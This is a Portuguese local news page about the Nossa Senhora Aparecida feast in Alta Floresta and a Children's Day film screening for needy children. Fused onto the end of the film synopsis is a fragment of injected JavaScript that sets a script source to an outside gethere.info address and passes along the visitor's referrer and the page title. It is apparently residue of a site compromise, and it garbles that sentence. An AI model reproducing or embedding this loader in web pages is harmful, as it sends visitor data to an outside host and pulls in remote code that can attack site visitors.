Capa / Em Destaque / Festa da Padroeira é comemorado com missas e procissão

Festa da Padroeira é comemorado com missas e procissão

padroeira-1Dionéia Martins

Na quarta-feira, 12 de outubro, é comemorado o dia das crianças e também é festejado o dia de Nossa Senhora Aparecida, padroeira do Brasil e de Alta Floresta.

A Igreja Católica de Alta Floresta vem desenvolvendo desde o início do mês de outubro a programação alusiva ao dia de Nossa Senhora Aparecida, comemorado nesta quarta-feira. Todos os dias às 6 horas da manhã está sendo celebrada missa na igreja matriz e ao meio dia é rezado o terço e a noite as novenas nas comunidades.

Na quarta-feira as festividades iniciam as 7:30 horas com a missa, às 9 horas acontecerá a missa das crianças e a consagração à Nossa Senhora, às 16 horas será celebrada uma missa especial para os idosos, encerando a programação com a missa campal às 18 horas seguida da procissão.

DIA DAS CRIANÇAS

O dia das crianças será comemorado com pipoca, cachorro quente e sessão de cinema pelo Gold Eventos e parceiros. Cerca de 500 crianças carentes que são assistidas pela Igreja Batista, passarão a tarde no Gold Eventos, onde serão recebidas com pipocas e assistirão ao filme Divertida Mente.

SINOPSE DO FILME

Riley é uma garota divertida de 11 anos de idade, que deve enfrentar mudanças importantes em sua vida quando seus pais decidem deixar a sua cidade natal, no estado de Minnesota, para viver em San Francisco. Dentro do cérebro de Riley, convivem várias emoções diferentes, como a Alegria, o Medo, a Raiva, o Nojinho e a Tristeza. A líder deles é Alegria, que se esforça bastante para fazer com que a vida de Riley seja sempre feliz. Entretanto, uma confusão na sala de controle faz com que ela e Tristeza sejam expelidas para fora do local. Agora, elas precisam percorrer as várias ilhas existentes nos pensamentos de Riley para que possam retornar à sala de controle – e, enquanto isto não acontece, a vida da garota muda radicalmente.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Sobre admin

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top